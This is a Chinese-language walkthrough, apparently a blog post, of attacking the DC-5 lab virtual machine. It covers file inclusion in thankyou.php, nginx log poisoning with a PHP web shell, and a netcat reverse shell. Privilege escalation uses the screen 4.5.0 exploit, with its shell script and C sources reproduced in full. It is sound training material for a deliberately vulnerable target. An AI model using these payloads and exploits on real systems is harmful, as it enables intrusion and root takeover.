DC5靶机渗透测试
文章目錄
- 環(huán)境版本:
- 一、信息收集
- 1.主機(jī)發(fā)現(xiàn)
- 2.端口掃描
- 二、漏洞發(fā)現(xiàn)
- 1.訪問(wèn)靶機(jī) web 服務(wù)
- 2.嘗試?yán)梦募┒?/li>
- 3.嘗試將惡意文件寫(xiě)入日志
- 4.利用文件包含訪問(wèn)日志并進(jìn)行利用
- 三、提權(quán)
- 1.查看可以 root 權(quán)限使用的命令
- 2.漏洞搜索
- 3.查找 exp,并查看內(nèi)容
- 4.使用 ftp 進(jìn)行傳輸文件
環(huán)境版本:
- VMware pro 16
- Kali 2021.1(虛擬機(jī))
- DC-5(虛擬機(jī))
一、信息收集
1.主機(jī)發(fā)現(xiàn)
arp-scan -l
2.端口掃描
nmap -A -p- 192.168.2.186
挨個(gè)主機(jī)掃描發(fā)現(xiàn) 192.168.2.186 為靶機(jī)
發(fā)現(xiàn)其開(kāi)放了 80 端口 nginx 服務(wù)、111 端口 rpcbind 服務(wù)、39424 端口,不知道啥服務(wù)enmm
二、漏洞發(fā)現(xiàn)
1.訪問(wèn)靶機(jī) web 服務(wù)
發(fā)現(xiàn)點(diǎn)擊其主頁(yè) contact -> submit 之后的返回頁(yè)面刷新會(huì)導(dǎo)致下方 footer 年份隨機(jī)改變
懷疑其存在文件包含
2.嘗試?yán)梦募┒?/h4>
http://192.168.2.186/thankyou.php?file=/etc/passwd
http://192.168.2.186/thankyou.php?file=/etc/passwd
發(fā)現(xiàn)存在該漏洞
3.嘗試將惡意文件寫(xiě)入日志
使用 BP 對(duì)該網(wǎng)頁(yè)進(jìn)行抓包、構(gòu)造流量包
/thankyou.php?<?php system($_GET['cmd']); ?>
4.利用文件包含訪問(wèn)日志并進(jìn)行利用
攻擊機(jī)開(kāi)始監(jiān)聽(tīng):
nc -lvvp 1234 #使用 nc 進(jìn)行連接利用
使用 BP 利用上一步的一句話木馬進(jìn)行命令執(zhí)行
/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.2.123 1234
得到靶機(jī) shell
三、提權(quán)
1.查看可以 root 權(quán)限使用的命令
find / -perm -u=s -type f 2>/dev/null
發(fā)現(xiàn) screen-4.5.0
2.漏洞搜索
searchsploit screen 4.5.0
3.查找 exp,并查看內(nèi)容
cd /usr/share/exploitdb/exploits/linux/local
cat ./41154.sh
發(fā)現(xiàn)其在 /tmp 路徑下編譯了兩個(gè) c,并執(zhí)行了若干命令
我在這里將這個(gè)文件分為3個(gè)文件:
libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){chown("/tmp/rootshell", 0, 0);chmod("/tmp/rootshell", 04755);unlink("/etc/ld.so.preload");printf("[+] done!\n");
}
rootshell.c
#include <stdio.h>
int main(void){setuid(0);setgid(0);seteuid(0);setegid(0);execvp("/bin/sh", NULL, NULL);
}
41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
將這三個(gè)文件放在同一個(gè)文件夾內(nèi),使用下述命令對(duì) 2 個(gè) c 文件進(jìn)行編譯、移除舊文件
gcc -fPIC -shared -ldl -o ./libhax.so ./libhax.c
rm -f ./libhax.c
gcc -o ./rootshell ./rootshell.c
rm -f ./rootshell.c
使用 vim 對(duì) 41154.sh 文件進(jìn)行格式轉(zhuǎn)換
vim ./exp.sh
:set ff=unix
:wq
4.使用 ftp 進(jìn)行傳輸文件
1)使用 vsftpd 搭建 ftp 服務(wù)(攻擊機(jī)搭建)
apt-get install vsftpd
2)更改配置
vim /etc/vsftpd.conf #編輯配置文件
改為如下(按照需求更改):
listen=NO //是否開(kāi)啟監(jiān)聽(tīng)ipv4和ipv6數(shù)據(jù)
listen_ipv6=YES //是否開(kāi)啟監(jiān)聽(tīng)ipv6數(shù)據(jù)# Allow anonymous FTP? (Disabled by default).
anonymous_enable=NO //是否允許匿名登陸,無(wú)需密碼# Uncomment this to allow local users to log in.
local_enable=YES //是否允許本地用戶登錄# Uncomment this to enable any form of FTP write command.
write_enable=YES //是否允許登陸者上傳文件# Default umask for local users is 077. You may wish to change this to 022,
# if your users expect that (022 is used by most other ftpd's)
local_umask=022 //設(shè)置本地用戶默認(rèn)要減免的權(quán)限# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=YES //目錄消息,能夠給遠(yuǎn)程登陸的用戶發(fā)送目錄
#
# If enabled, vsftpd will display directory listings with the time
# in your local time zone. The default is to display GMT. The
# times returned by the MDTM FTP command are also affected by this
# option.
use_localtime=YES //服務(wù)器所展示的目錄將隨著本地時(shí)間而改變
#
# Activate logging of uploads/downloads.
xferlog_enable=YES //開(kāi)啟上傳下載的日志記錄
#
# Make sure PORT transfer connections originate from port 20 (ftp-data).
connect_from_port_20=YES //確認(rèn)連接傳輸?shù)亩丝谔?hào)為20# You may override where the log file goes if you like. The default is shown
# below.
xferlog_file=/var/log/vsftpd.log //日志文件存放位置
#
# If you want, you can have your log file in standard ftpd xferlog format.
# Note that the default log file location is /var/log/xferlog in this case.
xferlog_std_format=YES //日志文件采用標(biāo)準(zhǔn)格式# You may fully customise the login banner string:
ftpd_banner=Welcome to FTP service. //在使用shell時(shí)登陸那么會(huì)發(fā)送歡迎語(yǔ)# You may specify an explicit list of local users to chroot() to their home
# directory. If chroot_local_user is YES, then this list becomes a list of
# users to NOT chroot().
# (Warning! chroot'ing can be very dangerous. If using chroot, make sure that
# the user does not have write access to the top level directory within the
# chroot)
chroot_local_user=YES //對(duì)本地用戶是否實(shí)施限制
chroot_list_enable=YES //開(kāi)啟限制白名單
# (default follows)
chroot_list_file=/etc/vsftpd.chroot_list //白名單路徑,若無(wú)這個(gè)文件需要自己創(chuàng)建# This option should be the name of a directory which is empty. Also, the
# directory should not be writable by the ftp user. This directory is used
# as a secure chroot() jail at times vsftpd does not require filesystem
# access.
secure_chroot_dir=/var/run/vsftpd/empty
#
# This string is the name of the PAM service vsftpd will use.
# pam_service_name=vsftpd
pam_service_name=ftp //此處ubuntu的系統(tǒng)需要改為ftp# This option specifies the location of the RSA certificate to use for SSL
# encrypted connections.
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO #
# Uncomment this to indicate that vsftpd use a utf8 filesystem.
utf8_filesystem=YES //編碼統(tǒng)一為utf8編碼,可以識(shí)別中文,防止亂碼
3)創(chuàng)建 ftp 用戶
useradd -m ftpuser #創(chuàng)建用戶
passwd ftpuser #更改密碼
cd /home
chmod 777 ftpuser
touch /etc/vsftpd.chroot_list #創(chuàng)建白名單文件
echo "ftpuser" > /etc/vsftpd.chroot_list
service vsftpd restart #重啟服務(wù)
4)ftp 傳輸文件及利用 exp
靶機(jī) shell:
cd /tmp
python -c "import pty;pty.spawn('/bin/sh')"
ftp 192.168.1.131 #因?yàn)槲腋鼡Q了網(wǎng)絡(luò),所以攻擊機(jī)ip變了
ftpuser
ftpuser
ls
ftp> get 41154.sh
ftp> get libhax.so
ftp> get rootshell
ftp> quit
chmod +x ./41154.sh
./41154.sh
注意:
- 構(gòu)造數(shù)據(jù)包發(fā)送多個(gè)之后靶機(jī)宕了,解決方法是加大靶機(jī)內(nèi)存
- 將 exp 從攻擊機(jī)傳輸?shù)桨袡C(jī)時(shí)考慮使用 nc 時(shí)無(wú)法連接,可能是路徑權(quán)限問(wèn)題
- /tmp 文件夾的權(quán)限是 777
- 此次測(cè)試我反復(fù)嘗試了 5 次,發(fā)現(xiàn)有時(shí)會(huì)將一句話木馬寫(xiě)入到 error.log 日志
總結(jié)
